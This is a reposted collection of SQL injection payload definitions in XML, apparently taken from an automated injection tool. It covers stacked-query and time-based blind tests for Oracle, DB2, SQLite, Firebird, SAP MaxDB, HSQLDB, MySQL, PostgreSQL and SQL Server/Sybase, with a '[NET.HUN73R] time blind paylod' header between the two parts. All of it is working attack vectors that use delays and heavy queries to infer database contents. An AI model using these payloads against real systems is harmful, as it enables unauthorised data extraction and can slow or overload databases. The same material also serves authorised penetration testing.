    <test>        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>        <stype>4</stype>        <level>4</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>        <request>            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle stacked queries (heavy query - comment)</title>        <stype>4</stype>        <level>2</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>        <request>            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle stacked queries (heavy query)</title>        <stype>4</stype>        <level>5</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>        <request>            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle stacked queries (DBMS_LOCK.SLEEP - comment)</title>        <stype>4</stype>        <level>4</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>        <request>            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>        <stype>4</stype>        <level>5</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>        <request>            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle stacked queries (USER_LOCK.SLEEP - comment)</title>        <stype>4</stype>        <level>5</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>        <request>            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>        <stype>4</stype>        <level>5</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>        <request>            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>IBM DB2 stacked queries (heavy query - comment)</title>        <stype>5</stype>        <level>3</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>        <request>            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>
    <test>        <title>IBM DB2 stacked queries (heavy query)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>        <request>            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>
    <test>        <title>SQLite > 2.0 stacked queries (heavy query - comment)</title>        <stype>4</stype>        <level>3</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>SQLite > 2.0 stacked queries (heavy query)</title>        <stype>4</stype>        <level>5</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird stacked queries (heavy query - comment)</title>        <stype>4</stype>        <level>4</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>        <request>            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>        <test>        <title>Firebird stacked queries (heavy query)</title>        <stype>4</stype>        <level>5</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>        <request>            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>SAP MaxDB stacked queries (heavy query - comment)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>        <request>            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>SAP MaxDB stacked queries (heavy query)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>        <request>            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 stacked queries (heavy query - comment)</title>        <stype>4</stype>        <level>4</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>        <request>            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>        <test>        <title>HSQLDB >= 1.7.2 stacked queries (heavy query)</title>        <stype>4</stype>        <level>5</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>        <request>            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB >= 2.0 stacked queries (heavy query - comment)</title>        <stype>4</stype>        <level>4</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>        <request>            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB >= 2.0 stacked queries (heavy query)</title>        <stype>4</stype>        <level>5</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>        <request>            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>    <!-- TODO: if possible, add payload for Microsoft Access -->    <!-- End of stacked queries tests --></root>

[NET.HUN73R]

time blind paylod

<?xml version="1.0" encoding="UTF-8"?>
<root>    <!-- Time-based boolean tests -->    <test>        <title>MySQL >= 5.0.12 AND time-based blind (SELECT)</title>        <stype>5</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>        <request>            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 OR time-based blind (SELECT)</title>        <stype>5</stype>        <level>1</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>        <request>            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 AND time-based blind (SELECT - comment)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>        <request>            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 OR time-based blind (SELECT - comment)</title>        <stype>5</stype>        <level>3</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>        <request>            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 AND time-based blind</title>        <stype>5</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>        <request>            <payload>AND SLEEP([SLEEPTIME])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 OR time-based blind</title>        <stype>5</stype>        <level>2</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>        <request>            <payload>OR SLEEP([SLEEPTIME])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 AND time-based blind (comment)</title>        <stype>5</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>        <request>            <payload>AND SLEEP([SLEEPTIME])</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 OR time-based blind (comment)</title>        <stype>5</stype>        <level>4</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>        <request>            <payload>OR SLEEP([SLEEPTIME])</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL <= 5.0.11 AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>2</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>        <request>            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version><= 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>MySQL <= 5.0.11 OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>2</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>        <request>            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version><= 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>MySQL <= 5.0.11 AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>        <request>            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>            <comment>#</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version><= 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>MySQL <= 5.0.11 OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>        <request>            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>            <comment>#</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version><= 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 RLIKE time-based blind (SELECT)</title>        <stype>5</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>        <request>            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>             <dbms_version>>= 5.0.12</dbms_version>       </details>    </test>
    <test>        <title>MySQL >= 5.0.12 RLIKE time-based blind (SELECT - comment)</title>        <stype>5</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>        <request>            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 RLIKE time-based blind</title>        <stype>5</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>        <request>            <payload>RLIKE SLEEP([SLEEPTIME])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 RLIKE time-based blind (comment)</title>        <stype>5</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>        <request>            <payload>RLIKE SLEEP([SLEEPTIME])</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL AND time-based blind (ELT)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>        <request>            <payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL OR time-based blind (ELT)</title>        <stype>5</stype>        <level>3</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>        <request>            <payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL AND time-based blind (ELT - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>        <request>            <payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL OR time-based blind (ELT - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>        <request>            <payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>PostgreSQL > 8.1 AND time-based blind</title>        <stype>5</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>> 8.1</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL > 8.1 OR time-based blind</title>        <stype>5</stype>        <level>1</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>> 8.1</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL > 8.1 AND time-based blind (comment)</title>        <stype>5</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>> 8.1</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL > 8.1 OR time-based blind (comment)</title>        <stype>5</stype>        <level>4</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>> 8.1</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>2</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>        </details>    </test>
    <test>        <title>PostgreSQL OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>2</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>        </details>    </test>
    <test>        <title>PostgreSQL AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>        </details>    </test>
    <test>        <title>PostgreSQL OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase time-based blind</title>        <stype>5</stype>        <level>1</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>        <request>            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase time-based blind (comment)</title>        <stype>5</stype>        <level>4</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>        <request>            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
